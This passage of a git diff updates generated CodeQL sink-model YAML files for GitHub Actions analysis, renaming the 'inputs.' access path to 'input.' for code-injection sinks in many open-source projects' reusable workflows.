--- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 99717acf024..4ce9252ce76 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/ini/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index d9a066c2b22..abb5b43c327 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 83e68740ac0..9e9da70e88e 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 45f05ea8826..8de3f4c1ca4 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 1cd25da918f..5ec8c096934 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index 2d5a077f1f4..af9582282d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/node-which/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 98571dfc5d9..61bbb9d5372 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/nopt/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 8cbd1927fe0..fdb440a742f 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index 6d3466f0927..efd05d69abe 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index c7178a298ef..9be191425ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.base-branch", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.repo", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.current-branch", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.chain", "code-injection", "generated"] \ No newline at end of file + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.current-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.chain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 08feb2033ff..65a14c7cfaa 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] \ No newline at end of file + - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index 3483cc13b9e..2c031ea9dc6 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index 45350e121a0..b90aacee9ca 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "inputs.project-name", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 9665157b3ad..56823f4e1ac 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-build-commands", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 9ef65a67c03..0f2937f9d14 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "inputs.success", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "inputs.project", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index eade5ecdae1..a88c74f8537 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "inputs.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index 1478244cc9c..b7dfd8fcc9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "inputs.language", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.org", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index 8bb0915294c..9de8130a93e 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] \ No newline at end of file + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index cba6c4fbe5a..ea4980b8cd7 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_name", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_file", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_file", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_folder", "code-injection", "generated"] \ No newline at end of file + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_folder", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 448d48f661d..8787c7e32c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.release_platform", "code-injection", "generated"] - - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.syft_version", "code-injection", "generated"] \ No newline at end of file + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index 50eb3b1af36..ea55d53c215 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.package-name", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.product-version", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goarch", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goarch", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 780fa92d20c..add2fe0d2e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "inputs.trigger_type", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "inputs.version", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "inputs.version", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.full_arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.libraries", "code-injection", "generated"] \ No newline at end of file + - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.full_arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.libraries", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 275d46772a2..400cd50b59f 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "inputs.model_scope", "code-injection", "generated"] \ No newline at end of file + - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 271c80c575e..42122b5ee22 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "inputs.package_version", "code-injection", "generated"] \ No newline at end of file + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "input.package_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 0f4ad0a7ca7..c694d3953f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index c38ae925860..9ecf401cab5 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.http-client", "code-injection", "generated"] - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.kube-version", "code-injection", "generated"] - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.java-version", "code-injection", "generated"] \ No newline at end of file + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index fd4697ac1c4..19fee627702 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "inputs.new_version", "code-injection", "generated"] \ No newline at end of file + - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git 